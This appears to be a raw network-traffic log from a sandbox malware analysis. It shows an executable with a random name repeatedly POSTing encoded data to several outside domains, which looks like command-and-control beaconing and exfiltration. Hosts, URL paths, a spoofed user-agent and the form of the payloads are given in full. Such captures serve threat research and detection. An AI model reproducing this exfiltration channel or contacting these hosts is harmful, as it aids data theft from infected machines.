                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      37 | 192.168.2.4 | 50045 | 54.67.42.145 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:39:03.588176012 CET | 696 | OUT | POST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=oNwV17kuuQ7IvyBcX0/PiSmsM8XjtTw6UabfkSSAQ5JRmF1xkcySI9B/Y7ycuVS01ZuSLqBkZC09+np5oT2WAiY75kgeUDu8iezuHhc7jEo31lxppfooPmWrtIzOgbZkPWfEpJCYbYQC8TtsRJ+7KCfiZUObM2Pdo+BuURnHmFdeCxSwKsktsvkfoIfADVoWHw==
                                                                                                                                      Jan 11, 2025 09:39:04.165417910 CET | 336 | IN | HTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:04 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      38 | 192.168.2.4 | 50046 | 54.67.42.145 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:39:06.136496067 CET | 716 | OUT | POST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLdRlgxxneaSL9B/TbydzlS/1ZqaLq9kZCQ9+iV5okCXAyY5/kgcQDu8iezuHhJQjEw30W5pp+orTWWs64zOkbZgPWf6pIf1baYC8SdsWY+4FCfkW0PNHD2Qlc0hXyLys1Q6H3fqbdF6+vAs1PW0OWVfc0cfa6AK3XjVOUatfm6zthk=
                                                                                                                                      Jan 11, 2025 09:39:06.714787960 CET | 336 | IN | HTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:06 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      39 | 192.168.2.4 | 50047 | 54.67.42.145 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:39:08.681613922 CET | 10798 | OUT | POST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Data Ascii: sTS= [TRUNCATED]
Jan 11, 2025 09:39:09.277791023 CET | 336 | IN | HTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:09 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50048 | 54.67.42.145 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:11.219958067 CET | 437 | OUT | GET /t3a1/?fd=Cr_TAhTpvZaLf&sTS=lPY12PoV4Qu/vhxdPmr863TaLMXXpQ43UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE1B48htAcHyBpMzkQSoug0pxqUZhndEiNFY= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:39:11.812021971 CET | 336 | IN | HTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:11 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50049 | 193.180.209.15 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:16.869918108 CET | 708 | OUT | POST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=hhhof8OBXTnfsE5dTEcGrghUMsoJcIM8zt0D6mbMUoi+joY/Ng3C4xnRLdxrusRereE3+d26NeJ1blRx7byWZBaW7O06h1Uv8C9IeAxTfK2bO/q6eTFzAvPpicB0c1A7Bd0aO3lsUa8E0t2TFjhMOuJcOMe0dUW54/3u0qW+AZVNHiFiq1eFPGdoc2KR1Htqzg==
Jan 11, 2025 09:39:17.513962984 CET | 729 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 499
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:08 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50050 | 193.180.209.15 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:19.451745987 CET | 728 | OUT | POST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbG+jJo/f0jC9xnRTNxUqsRvreYF+cK6Net1bnJx7qyVDxaUwu08+lUv8C9IeAk+fKubOMi6Mh9wDvPuyMB0WVA/Bd0oOy9CUY0E0sGTG3VPBuJeTcfzRmH80dum6YPfJ6lXGkI47E/SdG5bBxDl4EQjorAc9uC2p9WXgzC4eEbkZcU=
Jan 11, 2025 09:39:20.076097965 CET | 729 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 498
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:10 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50051 | 193.180.209.15 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:22.018497944 CET | 10810 | OUT | POST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Data Ascii: sTS= [TRUNCATED]
Jan 11, 2025 09:39:22.623862982 CET | 729 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 497
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:13 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50052 | 193.180.209.15 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:24.570935011 CET | 441 | OUT | GET /plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:39:25.214323044 CET | 729 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 496
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:16 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      45          192.168.2.4  50053        208.91.197.27   80                4588  C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:39:30.491816998 CET  729                OUT        POST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=yhPws430kmwkuN6v3JXpywNBCSY1fli6rSsg+6DeS31eWuEFD62U/EtFHHGxdbZtkqLtVOBjz3Lkru1ZCRsj0sCsyYCoP5Xldk//XBLcMwwzqypCCEKM0d+HYQvNqJlANk47wfeEwsL2SUAbTIzmsBsyjeF3cn+KpeLmn5jXlUAthOjKOhwBWl4FN7/hKJEurA==


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      46          192.168.2.4  50054        208.91.197.27   80                4588  C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:39:33.043699980 CET  749                OUT        POST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=yhPws430kmwkutqvwq/pngNCMyY1QFi+rSQg+7GFRFBeWNQFA72U+EtFMnG0T7YAkqHlVPtjz3fkrrJZCm4k18CumoCqL5Xldk//XFr2M0Uzqj5CAlKNrt+AJQvNgZlMNk5YweSuwvz2SWYbTZzplBs0neEYf0Xhm+qPqojWqQ1BtouQfQRWElc2Q82VHK5nwCJZ1LId9sFScRgZBBRFw54=


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      47          192.168.2.4  50055        208.91.197.27   80                4588  C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:39:35.587279081 CET  10831              OUT        POST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS= [TRUNCATED]


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      48          192.168.2.4  50056        208.91.197.27   80                4588  C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:39:38.129260063 CET  448                OUT        GET /9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:39:39.184936047 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:38 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                      Set-Cookie: vsid=910vr4841303783200380; expires=Thu, 10-Jan-2030 08:39:38 GMT; Max-Age=157680000; path=/; domain=www.joeltcarpenter.online; HttpOnly
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: 41c5<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hpV4Un2jU5hJOVTpNTQ5stMfLn1pGt0+if2Ooo6GfFcHuZuQL8B88URTHinVb2bCsE6U2fy1bm4sU+M6eb0Q1g==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      49          192.168.2.4  50057        104.21.88.139   80                4588  C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:39:44.322094917 CET  720                OUT        POST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=O4vtRILiG/aVjD+20ezenXteOIDT/BLzntxLwl8pkRePWL/Xa6jwOZI5fmIImg9xLiiTXKktyLpZ71VLMNnishrSGqz+VuKlwORZ0BP5CJoA+SJ9ZScDmq6RDH6/aowgEDGN5oPqq8nP9ULGGSP13PATDXxkVXqg5uckiMJp/F4zI296vSixki8zlLoJLO0xXg==
                                                                                                                                      Jan 11, 2025 09:39:44.937340975 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:44 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEBCD8y5KK2n%2BrsBbonTmtvVY2Paq77HTOEx8sgSfdYraiT4PVE2S6C2tc5MntIBiC9rYpbnAaoyj1JCMq0g6ougWqlvkpAf3ny6OSV5clmreWElW9vLsJozMGPBp6kI9n0hqxCIH9%2BJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 9003991889030f78-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:39:44.937367916 CET | 421 | IN | gzip-compressed response body (continued)
Jan 11, 2025 09:39:44.937665939 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 50058 | 104.21.88.139 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:46.871189117 CET | 740 | OUT | POST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=O4vtRILiG/aVsAm22/zeh3tRX4DTkxL/nt9Lwk4fniqPWrvXIIbwC5I5QGIJ7w9ELjfuXIAtyLtZ70lLL+fh+BrUd6z8IeKlwORZ0BzDCJAA9i59Y3wC466SAH6/Q4wkEDHY5sXQq5jP9QbGGGj6g/AVeHwRdXz5hbtrmPR77kQoNwwg+jDm2iYA4Mh9GNJ4MvidRBzXGTAU/1+UEDIRhVU=
Jan 11, 2025 09:39:47.397185087 CET | 1236 | IN | HTTP/1.1 404 Not Found
